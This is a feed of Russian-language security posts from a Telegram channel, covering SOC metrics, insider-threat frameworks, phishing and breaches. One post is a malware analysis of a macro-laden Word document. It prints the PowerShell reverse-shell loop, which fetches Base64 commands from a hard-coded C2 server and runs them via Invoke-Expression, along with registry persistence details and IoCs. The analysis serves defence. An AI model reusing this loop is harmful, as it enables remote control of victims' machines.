22 августа в 14.00 (мск) открою новый сезон позитивных вебинаров разговором о методах оценки эффективности аналитиков, процессов и инструментов, применяемых в SOC 📈. На трансляции вы узнаете:
1️⃣ Зачем и как измерять эффективность ИБ в целом и SOC в частности?
2️⃣ Какие показатели использовать для мониторинга, реагирования, threat intelligence, threat hunting и других процессов?
3️⃣ Можно ли уйти от измерения числа инцидентов, среднего времени реагирования и заменить их бизнес-ориентированными показателями?
4️⃣ Стоимость учетной записи в даркнет, количество негативных упоминаний в СМИ, предотвращенных недопустимых событий и другие примеры кумулятивных метрик для SOC?
5️⃣ Лайфхаки для оценки эффективности.

Вы получите ключевые метрики для оценки разных аспектов работы SOC, а в качестве бонуса — примеры из практики, которые помогут вам внедрить эти метрики в своей компании. Присоединяйтесь! 🤝

Читать полностью…

Тут австралийцы задались вопросом кибербезопасности дронов 🛸 и выпустили небольшой отчетик о том, какую роль БПЛА играют в ИБ, какие угрозы ИБ они несут, и как вообще эта тема регулируется в мире. Не то, чтобы открытие и вау, но как первый подход к снаряду вполне себе. Для начала разговора вполне подойдет 🛸

Читать полностью…

Мда, маркетологам в забугорщине непросто приходится. Что не креатив, то потом извиняйся перед геями, лесбиянками, небинарными личностями, женщинами, афроамериканцами и афроафриканцами, коренными жителями США, католиками и протестантами, иудеями и православными... 🌈

Вот Palo Alto на DEFCON решило сделать живые торшеры, в качестве моделей для которых взяли молодых девушек 👩🏼 Еще 3-4 года назад ни у кого и мысли бы не возникло возмущаться - на выставках с преимущественно мужским контингентом полуголые грации, бодиарт, гимнастки под потолком... были в порядке вещей на всех материках, кроме, пожалуй Антарктиды 🌏 А вот тут случился облом, да такой, что генеральному директору ИБ-вендора пришлось публично извиниться перед всеми, кого обидела эта инсталляция. Или перформанс? Я все время их путаю.

А дальше ведь еще хуже будет. Точнее не креативно и скучно. Все будут бояться сделать что-то не то, что-то, что может обидеть или "тех", или "этих". А значит все будут серые и одинаковые, скучные и безликие... То ли дело у нас 😎 Правда, у нас другие проблемы.

Читать полностью…

Если вы вдруг вы, случайно, узнали, что к вам идет проверка, задача которой оценить ваш план реагирования на инциденты ✔️❌ (а у вас он должен быть согласно нормативке), а вы эту свою обязанность мягко говоря просрали, то рекомендую распечатать приведенную картинку и выдать ее за план реагирования! 💡

Во-первых, это действительно план действий, хоть и хреновый ☺️ Во-вторых, распечатка означает, что вы о задаче хотя бы думали и даже предприняли какие-то действия, а это уже лучше, чем "ну не смогла я". В-третьих, это смешно, а проверяющие тоже люди и они тоже могут посмеяться с вами и простить на первый раз! 😇

Но лучше, конечно, о плане позаботиться заранее! 😕

Читать полностью…

Видел я тут на дороге автомобильный 🚘 номер - А256ЕС. И подумал, что это, пожалуй, единственный, как мне кажется, вариант номера, который соответствует ГОСТу и имеет отношение к ИБ (256 бит ключа у алгоритма шифрования AES). Есть, конечно, варианты О152РУ (вместо 152 можно поставить и 187), но это уже больше притянуто за уши к ИБ. У американцев все-таки классная практика, когда ты за деньги можешь себе собственный автомобильный номер выбрать 🚗 Я бы себе что-нибудь ИБшное обязательно взял.

Читать полностью…

У MITRE есть проект по матрице внутренних угроз, очень похожий по идеологии на MITRE ATT&CK. Но, как это ни странно, он такой далеко не единственный и нашлись желающие внести свою лепту в создание очередного фреймворка по борьбе с внутренней угрозой. При этом, это не просто "очередная матрица". В новом проекте, Insider Threat Matrix, речь идет не только о методах, используемых инсайдерами, но и о мотивах и используемых ими средствах, а также о мерах обнаружения и защиты такой внутренней активности 👺

Если MITRE ATT&CK делить атаку на 14 тактик, то в Insider Threat Matrix таких фаз всего 5:
1️⃣ Мотив. Приводится 16 различных причин, побуждающих инсайдера совершать свои черные дела (шпионаж, низкая осведомленность, персональная выгода, самосаботаж, человеческая ошибка и т.п.). Можно заметить, что в списке причин не только злонамеренные, но и случайные причины.
2️⃣ Намерение (желание). 19 различных обстоятельств, которые позволяют реализовать нарушение (наличие Bluetooth, установка ПО, печать, снимки экрана, web-доступ и т.п.).
3️⃣ Подготовка. 22 действия, осуществляемые для того, чтобы достигнуть цели по нанесению вреда (обфускация данных, архивация данных, приватный/инкогнито серфинг, чтение реестра Windows, тестирование возможности печати и т.п.).
4️⃣ Нарушение. 18 приносящих вред действия (кража, неавторизованная печать документов, выноси физического носителя, нарушение бизнес-операций, установка неразрешенного ПО и т.п.).
5️⃣ Защита от расследования (антифорензика). 16 действий для заметания следов (очистка артефактов в браузере, удаление учетной записи, удаление файлов, подмена логов, стеганография, удаление ПО и т.п.).

Читать полностью…

Кстати, о победных коммуникациях 🥳 Был у меня в практике случай, когда меня позвали провести штабные киберучения для топ-менеджеров в одну группу компаний. Я приехал обсуждать сценарии, ограничения, проверяемые болевые точки, список участников и т.п. В конце я спросил, есть ли у заказчика какие-либо вопросы и просьбы. И я их получил 😫

Заказчик в лице CISO попросил, чтобы в рамках штабных киберучений я не проверял ряд сценариев, а по итогам я должен был бы исключить все негативные моменты и показать только то, как компания отлично справляется с инцидентами ИБ ✊ На мой логичный вопрос, а в чем тогда смысл, если никто ничего не планирует менять в процессах ИБ, я получил ответ, что в бюджете киберучения заложены 🤑 и в планах на год CISO эту тему заявлял, но его руководство не любит негативных новостей ☹️ и поэтому надо построить всего лишь потемкинские деревни, а за красивой картинкой останется разруха. От таких киберучений я отказался, но сама по себе ситуация не уникальна.

Очень важно, перед началом штабных киберучений, да и любых других ИБ-проектов, задаваться двумя вопросами - "Зачем это надо делать?" и "Какого результата мы хотим/нам надо достичь?". И уже по результатам ответов принимать решение, ввязываться в эту историю или нет.

Читать полностью…

Во время штабных киберучений, которые я провожу достаточно часто, один из сценариев, которые я проверяю с участниками, - "Вам прилетело письмо от регулятора. Как вы убедитесь, что это письмо от него, а не фейк?" И надо сказать, что этот сценарий все проходят по-разному - кто-то успешно справляется с ответом и предлагает варианты взаимной аутентификации, а кто-то с удивлением задается вопросом: "А что, надо проверять письма от регулятора?".

И вот яркий пример из жизни, что да, надо проверять. Хакеры из группировки UAC-0198 от имени Службы безопасности Украины отправляли фишинговые сообщения различным государственным организациям страны, с помощью которых было заражено более 100 компьютеров вредоносом AnonVNC. О последствиях не сообщается.

Такие кейсы не новость - известны случаи фишинговых сообщения от Службы нацбезопасности Армении, от ФСТЭК, новозеландского CERT, ФинЦЕРТа и т.п. Так что если у вас еще нет соответствующего плейбука, самое время задуматься и уточнить:
❓ У почтовых доменов ваших регуляторов, включая региональные управления, включены DMARC, SPF, DKIM?
❓ У вас есть контакты сотрудников регуляторов, у которых вы можете проверить факт отправки вам сообщений или сделанных звонков?
❓ Вы знаете, как выглядят настоящие сообщения от регуляторов?
❓ Вы читали мою предыдущую заметку про плейбук для сообщений регуляторов?

Читать полностью…

Если вдруг вы ищете презентации с BlackHat и DEFCON 2024, то их есть у меня:
👨‍💻 BlackHat
👨‍💻 DEFCON

ЗЫ. Там уже бОльшая часть, но, возможно, будут еще что-то докладывать!

ЗЗЫ. Презентации и видео с PHD2 тоже недурны ☺️

Читать полностью…

Тут Денис Горчаков в VK поделился размышлениями о современных HR-практиках и отношении молодежи к работе, которые могут быть отнесены в полной мере и к ИБ. И эта запись на стене Дениса меня тригернула, расставив в моей седой голове 🧔🏼‍♂️ все по полочкам. Не буду переписывать все, что написал Денис, утащу только одну фразу, которая лежит в основе трудоустройства многих молодых людей:

"Я здесь за то, что хорошо умею делать, могу и буду работать над тем, что сейчас вам нужно. Я здесь потому, что по совокупности условий у вас сейчас лучшее для меня предложение, оно максимально отвечает моим интересам. А я, очевидно, наиболее остальных отвечаю вашим требованиям"

Это некий манифест, который сильно отличается от того, что было раньше, когда именно работодатель правил балом и устанавливал крепостное право правила игры 🤕 Сегодня ситуация иная - сегодня правила устанавливает работник. А если работодателю это не нравится (и он при этом не монополист), то есть куча других, которые пойдут на условия кандидата и с этим надо мириться. Я 7 лет назад уже рефлексировал в блоге на тему "бывает ли безопасность с 10 до 18" ⌛️ и похоже я уже тогда сталкивался с проявлениями этого "кодекса фрилансера", о котором пишет Денис. Хочу - работаю там и тогда, как мне удобно; не хочу - не работаю. Я своего мнения не поменял, но похоже таких динозавров остается все меньше.

А самое главное, что это все влияет на ИБ. И с точки зрения выстраивания карьерьного пути 🗺 ИБшника внутри службы ИБ компании, и с точки зрения отношения к доверенной конфиденциальной информации (нет уже того пиетета, который был раньше), и с точки зрения выстраивания дежурных смен при круглосуточной работе, и с точки зрения мотивационных схем для ИБшников (деньги уже не решают 🤑), и с точки зрения организации рабочего пространства, и много еще с каких точек зрения. И те, кто этого не понимает, будут проигрывать гонку... и терять ИБшников, которые будут уходить в "смузяшные" компании.

Читать полностью…

Center for Threat-Informed Defense анонсировал новый проект по описанию процесса моделирования атак на базе матрицы ATT&CK. В целом ничего нового нет - просто процесс разложили на 4 этапа и каждый подробно описали с соответствующими примерами.

Сами этапы вытекают из типовых 4 вопросов, которые обычно задаются при моделировании угроз и применяются во многих других методиках:
❓ Над чем мы работаем? На этом этапе мы описываем основные и второстепенные функции анализируемой системы и за счем декомпозиции выделяем ключевые активы системы.
❓ Что может пойти не так (что может произойти плохого)? На этом этапе мы определяем и приотизируем угрозы для активов, определенных на 1-м этапе. Причем делаем мы это не в абстрактных описаниях угроз, а в виде списка техник из матрицы MITRE ATT&CK.
❓ Что нам надо сделать с этим? Затем с помощью Mappings Explorer от CTID мы определяем защитные меры для определенных ранее техник.
❓ Мы сделали все хорошо? А тут мы тем или иным способом проверяем, что мы ничего не упустили, например, с помощью кибериспытаний.

Что мне понравилось в этой методологии, так это важный момент, когда вам надо совместить теорию и практику. Ведь если следовать, например, методике ФСТЭК, вы просто теоретизируете, опираясь на собственный опыт, как можно реализовать ту или иную угрозу. А у того же НКЦКИ или ФинЦЕРТа рассылаются просто бюллетени с индикаторами или, иногда, с техниками по ATT&CK, на базе реальных инцидентов. Но как это совместить?

Я уже несколько лет в курсе по моделированию угроз предлагаю вариант, схожий с тем, что сейчас прописал у себя CTID - сначала вы выбираете техники из реальных инцидентов, описанных в TI-бюллетенях (то, что CTID называет "доказательствами"/evidence), а потом добавляете туда уже то, что CTID называет "теорией"/theory. А затем уже оцениваете угрозы по этим двум параметрам (то, чего у меня в курсе нет).

Читать полностью…

Как-то, после принятия 250-го Указа, я разговаривал с одним замминистра, который делился тем, как он проходил обучение, необходимое для замруководителя организации по ИБ, который упоминается в Указе Президента. Так вот обучение проходил не он сам 👨‍🏫 - был направлен один из администраторов ИБ, который и сидел 500+ часов на курсах, пока замминистра делом занимался. И экзамен тоже проходил админ. А все потому, что поднимать действующего руководителя отдела ИБ до замминистра никто не захотел/не смог, а Указ выполнять надо. А что делать организациям, в которых вообще нет нормального ИБшника? В таких случаях помогает vCISO 🧐

В России 🇷🇺 тоже есть такие сервисы и даже отдельные эксперты предлагают такие услуги. Поэтому достаточно интересно посмотреть, что предлагают vCISO за рубежом 🌎 Интересно, что в крупных компаниях на первое место по задачам vCISO занимает проверка существующих защитных мер 🔍, в небольших - GRC и разработка стратегии ИБ, а в самых крупных - GRC, оценка зрелости ИБ 💯 и менторинг молодых ИБшников. Если сложить упомянутые востребованные сервисы, то в Топ5 надо будет добавить еще определение бюджета на ИБ 🧮

Жаль, что в России установлены требования наличия собственного руководителя ИБ в штате (и хотя Минцифры допускает шаринг ИБшника между компаниями, ФСТЭК категорически против такого подхода) - у нас просто нет достаточного количества грамотных руководителей по защите информации 🤷‍♂️ В итоге многие занимаются очковтирательством и назначением на эти роли людей, которые очень далеки от ИБ (но близки к топ-менеджменту) 😕 Надеюсь, когда-нибудь это требование будет отменено и тогда услуги vCISO, разумеется, с четким описанием их сферы деятельности и ответственности за результат, станут еще более востребованными чем сейчас 🥺

Читать полностью…

Предвыборный штаб Дональда Трампа подтвердил факт взлома внутренней переписки ✉️ после того, как издание Politico начали получать документы из анонимного источника. Штаб обвинил в этом “враждебные иностранные силы”, возможно, Иран 🇮🇷, ссылаясь на отчет Microsoft о фишинговой атаке на высокопоставленного сотрудника президентской кампании в июне 2024 года. Документы, включая досье на кандидата в вице-президенты Джей Ди Вэнса, были переданы анонимом, что представляет собой серьезную утечку для кампании Трампа 🇺🇸

Вспоминается история 2016-го года, когда во время президентской гонки между Дональдом Трампом и Хилари Клинтон, хакеры взломали 👨‍💻 у последней личный почтовый сервер и утянули всю внутреннюю переписку, включая и все "грязное белье", которое затем распространялось в СМИ и в соцсетях 🤮 Отдельные эксперты считают, что эта утечка помогла Трампу получить доли процентов голосов избирателей, которых и хватило для победы. Интересно, повторится ли ситуация сейчас?.. 👠 Что еще опубликует Politico?.. 🤔

Читать полностью…

Алиса Сабо опубликовала триптих 🙌 про управление рисками (часть первая, вторая и третья), про подмену понятий, про то, как под анализом рисков пытаются втюхать всякую дичь, про то, что ИБшники ни хрена не понимают, что такое анализ рисков на самом деле, и вот это вот все. Я жду части про оценку вероятности и ущерба ⏳

Читать полностью…

Судя по тому, что сейчас пишут в каналах сопредельной страны, стоит ожидать новых фишинговых кампаний со следующими темами:
☢️ Радиационное заражение с Курской АЭС
🏃 Эвакуация Курска, Курчатова и других городов области (деньги за эвакуацию, "секретные" планы эвакуации, помощь в эвакуации и т.п.)
🏡 Сдача жилья в соседних с Курской областью городах (предоплата, сайты для поиска жилья и т.п.)
🆘 Волонтерская помощь (сайты и каналы с волонтерской помощью и т.п.)
✈️ Рост цен на авиабилеты за границу и т.п.
🔫 Мобилизация (секретные планы мобилизации и т.п.)

Как мне кажется, стоит включить эти темы в очередные занятия или расылки по повышению осведомленности, чтобы пользователи не попадались на удочку 🎣 и предупреждали и своих родных тоже; особенно если они живут и работают в Курской и сопредельных областях.

Читать полностью…

Надеюсь, никого не оскорбляет? И пропагандой не является? И демонстрацией способов обхода?

Читать полностью…

Совет по международным отношениям опубликовал статью, в которой обсуждается усиливающаяся цифровая изоляция России 🇷🇺 и ее растущую зависимость от Китая 🇨🇳 Автор пишет, что после вторжения в Украину в 2022 году Россия все больше отрезана от западных технологий и компаний, что привело к активизации сотрудничества с Китаем в сфере технологий. Это создает новые уязвимости для России, особенно в области кибербезопасности и шпионажа против нее 👲

Также автор призывает США 🇺🇸 и их партнеров использовать разведданные из открытых источников, чтобы выявлять спрос России на китайские технологии. Эти данные можно получать из различных источников, включая российские конференции по кибербезопасности (где автор слышала, чтобы у нас про китайцев на ИБ-тусовках говорили?) и публичные контракты. Это поможет обнаружить уязвимые места, такие как зависимость от китайских полупроводников и смартфонов 🧑‍💻

Кроме того, предлагается американской разведке 🇺🇸 провести анализ технологий, таких как Astra Linux, используемых в российских военных системах, что может выявить потенциальные слабые места, которые США и их союзники могут использовать для получения преимуществ в киберпространстве.

Читать полностью…

!!р^д**н**c 🤔

Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ.

Он содержит текст муниципального правового акта, который не отображается корректно, в связи с чем пользователя побуждают «Включить содержимое» и разрешить таким образом выполнение встроенного в документ макроса.

Встроенный макрос приводит документ к читаемому виду путем простой замены комбинаций символов на буквы (;; → у ; ** → o ; ?? → a и т. д.), а также извлекает и закрепляет в автозагрузке полезную нагрузку — достаточно простой реверс-шелл — в виде PowerShell-скрипта.

Полезная нагрузка находится в содержимом документа после строки DigitalRSASignature и состоит из двух частей, закодированных в Base64 и разделенных строкой CHECKSUM — <part1>CHECKSUM<part2>, которые декодируются и записываются в файлы:

• <part1> -> %USERPROFILE%\\UserCache.ini.hta
• <part2> -> %USERPROFILE%\\UserCache.ini

UserCache.ini.hta прописывается макросом в автозапуск Windows Explorer через ключ реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD. Назначение данного файла — запустить исполнение файла UserCache.ini.

UserCache.ini представляет собой легковесный реверс-шелл, который использует узел 94.103.85.47 (Vdsina, Moscow) как управляющий сервер. Данный инструмент получает и выполняет набор команд с http://94.103.85.47:80/api/texts/<client_id>, где <client_id> = <имя компьютера>_<имя пользователя>_<серийник тома жесткого диска>.

Команды передаются в формате XML и содержат несколько атрибутов:

• CountRuns — сколько раз нужно выполнить команду;
• Interval — интервал ожидания в минутах между последовательными выполнениями одной команды;
• Module — закодированная в Base64 команда.

...
try {
  $Commands = [xml]$Configs;
  $cycle_num = 0;
  
  while($true){
    $num_commands_completely_executed = 0;
    $num_commands_executed = 0;
    foreach ($CommandConfig in $Commands.Configs.Config)
    {
      $num_commands_executed += 1;
      $quot = [int][Math]::Floor( $cycle_num / [int]$CommandConfig.Interval);
      $rem  = [int][Math]::Floor( $cycle_num % [int]$CommandConfig.Interval);
  
      if($quot -lt [int]$Command.CountRuns -and $rem -eq 0){
        $command_expr = FromBase64 $CommandConfig.Module;
        try{
          Invoke-Expression($command_expr);
        }
        catch {}
      }
  
      if(([int]$CommandConfig.Interval * [int]$CommandConfig.CountRuns) -lt [int]$cycle_num){
        $num_commands_completely_executed += 1;
      }
    }
  
    Start-Sleep 60;
    if([int]$num_commands_completely_executed -eq [int]$num_commands_executed){
      break;
    }
    $cycle_num += 1;
  }
}
catch {}
...

Для блокировки автоматического выполнения макросов можно воспользоваться руководством от Microsoft.

IoCs:

Постановление_по_ГО_updated.doc
13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b

UserCache.ini.hta
e80e0b57cf3f304cb7d6dba4b0bb65da18f4d32770a3d6f3780fdab12d2617c9

UserCache.ini
ccff23a8f7c510b49264cdacf9ab6b43e9be0671670ce2eec75851920e6378b7

94.103.85.47

#malware #news #detect #ti
@ptescalator

Читать полностью…

Проблема: сотрудники записывают свои пароли на стикеры и приклеивают их к мониторам 🖥

Способы решения:
➖ Compliance: Остановите это немедленно!
➖ Инженер ИБ: Давайте внедрим OTP!
➖ Риск-аналитик: Спрячьте стикер в ваш кошелек 👛
➖ Бизнес: Если это не приводит к катастрофическим последствиям, забейте 🤘

А вы какой вариант выберете?

Читать полностью…

Подсобрал некоторые из существующих фреймворков по угрозе от инсайдеров, индикаторам и техникам, методам обнаружения и защиты:
🔤 Insider Threat TTP Knowledge Base v2.0.0 (писал про него)
🔤 Insider Threat Matrix (малость подзаброшен)
🔤 Insider Threat Matrix (описан выше)
🔤 Common Sense Guide to Mitigating Insider Threats, Seventh Edition
🔤 FBI: The Insider Threat: An introduction to detecting and deterring an insider spy (больше фокусируется на различных индикаторах)
🔤 National Insider Threat Task Force (NITTF) от Национальной разведки США
🔤 Insider Attack Matrix
🔤 Insider Risk Management Program Evaluation (переложение NIST CSF на борьбу с инсайдерами от CISA)

Читать полностью…

Риэлторы-мошенники "развели" Ларису Долину на 130 миллионов рублей!.. 🤑 Да, это реальность! 40 миллионов, 130 миллионов, 27 миллионов, 60 миллионов, 43 миллиона... Суммы, которые получают мошенники 💻 измеряются уже десятками миллионов, что даже по международным меркам в топе. В США кибермошенничество с недвижимостью тоже на первом месте по объему хищений, но там суммы все-таки поменьше, обычно несколько сотен тысяч долларов, до полумиллиона 💸

Читать полностью…

Знаете, в Cisco была такая практика, когда раз в квартал, какой-нибудь босс писал на всю компанию письмо ✍️ про то, какие мы все молодцы (даже если нет) и как у нас все хорошо (даже если нет) и мы скоро всех порвем (даже если нет). Во время COVID-19 такие письма сменили тональность и топ-менеджеры разного уровня стали в них писать о чем-то простом и понятном, рефлексируя 😭 публично и показывая всем, кто находится в непростой ситуации, что все в одной лодке. Схожая история была, когда в мире происходила какая-нибудь катастрофа или авария. Уже не знаю, были ли такие письма от души или по разнарядке, но создавалось впечатление, что руководство всегда на связи и всегда в курсе всего происходящего. А самое главное, что оно не бросает вас на произвол судьбы 🆘

И вот смотрю я на коммуникации в Курской области своим непрофессиональным взглядом, оцениваю то, что пишут официальные каналы руководителей разных населенных пунктов и субъектов, что пишут СМИ, что пишут в народных каналах... И понимаю, что чиновники не умеют в кризисные коммуникации от слова совсем ☹️ И PR-службы у них отвыкли от правильных коммуникаций, привыкнув только к победным реляциям 🥇 А жители не знают, куда бежать и кого слушать. Утром - "эвакуируйся", днем "все нормально", вечером "немедленно у*бывайте", а ночью "прежнее сообщение считать недействительным". Отсюда паника и очередные потоки брани в адрес руководства... 😫

К чему это я? Да к тому, что в управлении инцидентами, часть связанная с коммуникациями очень важна. Иногда даже важнее всего остального. А иначе люди будут попадаться на "фейковых боссов", "вам звонит мэр", "вам единовременная выплата от президента", "спасите свои средства, переведя их на резервный счет", "установите ПО для удаленной техподдержки"... В условиях выстроенных коммуникаций, мы начинаем додумывать и... совершать ошибки, чем и пользуются плохие парни в мире физическом и виртуальном.

Читать полностью…

Представьте, что вам предлагают через год возглавить ИБ-службу компании вашей мечты с подчинением генеральному директору 🧐 Рост зарплаты 10х, персональный помощник, большой кабинет с диванчиком с видом на парк, любые ИБ-«игрушки»… 🤑 Но при этом вы должны будете упахаться в течение года, чтобы получить знания и навыки, нужные для работы. Вы не сможете в течение года ездить в отпуск, встречаться с друзьями, ходить на выставки, в кино и рестораны. У вас даже не будет нормальных выходных. Все ваше время будет уходить на учебу 😫

Читать полностью…

Когда участники "хакерских" конференций жалуются, что персонал отелей их гнобит, не любит, шмонает и т.п., они должны понимать, что они [участники] для персонала и есть угроза 👮 Такая же, как вредоносы, DDoS, RCE и т.п. - угрозы для ИБшников. И десятких фейковых точек доступа в отеле, неработающие банкоматы, взломанные системы цифрового контента, включающаяся ночью сигнализация - это проблема для других проживающих, коим не повезло снять номер в те же даты, что и BlackHat/DEFCON, а также и для самих отелей. У всех своя модель угроз 🤔

Читать полностью…

Center for Threat-Informed Defense обновил свой проект Top ATT&CK Techniques, выпустив вторую версию спустя 2 года после первой. Концепция проекта не поменялась - вы задаете ряд условий применительно к вашей организации и "калькулятор" выдает вам ваш собственный Топ10, а не тот, который вам навязывают внешние компании, собирающие данные, как правило, с множества своих средств защиты (да, они видят картину шире, но могут не учитывать то, что актуально именно для вас).

Какие-то кардинальные изменения в проекте заметить сложно, но они есть. Используется версия матрицы 14.1 (правда, текущая сейчас уже 15.1), улучшили графический интерфейс. Также проект представляет пример Топ10 применительно к шифровальщикам - этот список составлялся экспертами CTID. Они, правда, обещали, что выпустят и другие Топ10, но пока кроме Ransomware Top10 Techniques ничего нет. Но и ждать чего-то совсем нового не стоит - все-таки основная логика у него под капотом и его надо просто использовать для составления списка основных техник и методов защиты от них.

Читать полностью…

Вот так объявляют творческий конкурс по ИБ - накреативить что-то, написать статью, мемасики выдумать и всякое такое. Призы солидные - дроны, айфоны, планшеты и даже ноутбуки. И ты весь такой креативный и писучий приходишь, участвуешь и... не выигрываешь 😭

Жюри решает, что Лукацкий не может наравне со всеми участвовать и надо его в отдельную категорию выделить, поощрить спецпризом и пусть идет отсюда и не мешает молодежи развивать свое творческое начало и демонстрировать креатив 🎨 Пусть не отнимает надежду и не отбивает охоту творить. А то, ишь, заполонил все вокруг... 🖕 И ты уходишь с утешительным призом заливать его в одиночестве коньяком 🍷 Не надо быть как Лукацкий, я тут сам как-нибудь...

Читать полностью…

Как вы можете быть консультантом и хотеть получать большие деньги, если у вас нет своего фреймворка или какой-нибудь модели?! Никак. Вот и в Accenture подумали также 💡 и разработали модель оценки зрелости вымогателей (Extortion Group Maturity Model, EGMM) 😷 , которую предлагается использовать как аналитический инструмент, помогающий оценить достоверность, стабильность и ожидаемое поведение активных программ-вымогателей и группировок. Правильное применение модели может помочь лицам, принимающим решения, судить о том, должны ли они взаимодействовать (и как) с вымогателями, а также указать на ожидаемое поведение группировки 🤝

EGMM помогает организациям оценить предсказуемость и стабильность группы угроз на основе 1️⃣9️⃣ уникальных параметров, которые затем используются для размещения группы на диаграмме рассеяния по двум осям - стабильность и предсказуемость, что дает попадание в один из 4 квадрантов: от хаотического поведения до стабильного и от предсказуемого до ненадежного 🤔

Все хорошо в этой идее кроме одного - ежемесячно появляется около 30 новых семейств шифровальщиков; кто будет оценивать каждое из семейств и стоящих за ними группировок по EGMM? Получается, что надо иметь в своем составе команду Threat Intelligence, которая и будет заниматься этим? Не все смогут...

Читать полностью…

Раз уж дал комментарий для радио, то чего пропадать контенту. Специалисты обнаружили уязвимость 18-летней давности, которая угрожает компьютерам под Linux 😁 и macOS 📱, на которых запущены браузеры Chrome 📱, Chromium, Firefox 📱 и Safari 📱. Уязвимость, названная "0.0.0.0-Day", позволяет вредоносным сайтам слать JavaScript-запросы 📱 к локальному адресу 0.0.0.0, а уязвимый браузер будет пересылать их на определенные локальные сервисы на компьютеры, что позволит злоумышленникам красть информацию, изменять настройки ПО, загружать вредоносный код и даже удаленно исполнять код.

На Windows данной проблемы нет, так как она блокирует такие внешние запросы к локальному IP. Разработчики браузеров сейчас в процессе исправления данной уязвимости: 👨‍💻
➖ Google пообещала устранить этот баг в 128 версии Chromium (сейчас в бете) и закончить его к 133 версии Chrome.
➖ Apple внесет изменения в очередную версию движка WebKit и в новом обновлении macOS она должна быть доставлена до пользователей
➖ Mozilla в процессе решения данной проблемы, но когда это будет сделано не сообщается.

Процент web-сайтов, которые коммуницируют с локальным адресов 0.0.0.0 растет и сейчас составляет 0,015% от общего числа сайтов в Интернет, то есть всего около 100 тысяч web-ресурсов (с июня начался экспоненциальный рост).

Читать полностью…

Помните американскую компанию Johnson Controls, которую взломали 🧑‍💻 в прошлом сентябре, утянули много данных и потребовали выкуп в 50 миллионов долларов? Так вот тут на днях в ее видеокамерах, а она выпускает много всего промышленного, нашли 6 уязвимостей, которые позволяли хакерам получать доступ к видеосистемам и перехватывать видеопоток от уязвимых промышленных камер 🏭

А в Telegram-каналах вчера писали, что ВСУ получили доступ к видеокамерам, расположенным вдоль дорог 🛣 в Курской области, отслеживая перемещение российских войск в рамках контртеррористической операции. Самое интересное, что инструкции по взлому камер видеонаблюдения давно выложены на хакерских проукраинских сайтах. Ровно тот же способ применялся в начале конфликта Израиля и ХАМАС 🇮🇱

А групп в соцсетях, которые торгуют доступами к камерам видеонаблюдения в квартирах, фитнес-центрах, медкабинетах, борделях, загородных домах и т.п., вагон и маленькая тележка 🔞 И существуют они уже не первый год и с ними никто особо не борется. Но самое главное, что они показывают проблему, которая существует, - влияние хакеров на мир физический. И одно дело, когда кто-то наблюдает когда ты ковыряешься в носу, и совсем другое - когда данные перемещения войск сливают противнику, который потом бомбит колонну 🧨

То есть это тема-то не новая, но почему-то на нее мало кто обращает внимание. Видеокамеры и системы управления ими вообще могут не относится ни к ГИС, ни к КИИ, а значит и защищать их необязательно. И вот результат... 💥

Читать полностью…

Американская ипотечная компания LoanDepot, столкнувшаяся в январе с атакой со стороны Alphv/BlackCat, зашифровавших данные 16 миллионов пользователей, объявила о потерях в 42 миллиона долларов (около 1️⃣0️⃣🔣 всего полугодового оборота компании ❗️), которые включают в себя стоимость расследования и восстановления, стоимость уведомления клиентов об инциденте, стоимость консалтинга, судебные разбирательства и т.п. Также компанию ожидает групповой иск в размере 25 миллионов долларов 🤑

ЗЫ. Alphv/BlackCat объявили, что сейчас в процессе продажи украденных ипотечных данных 😾

Читать полностью…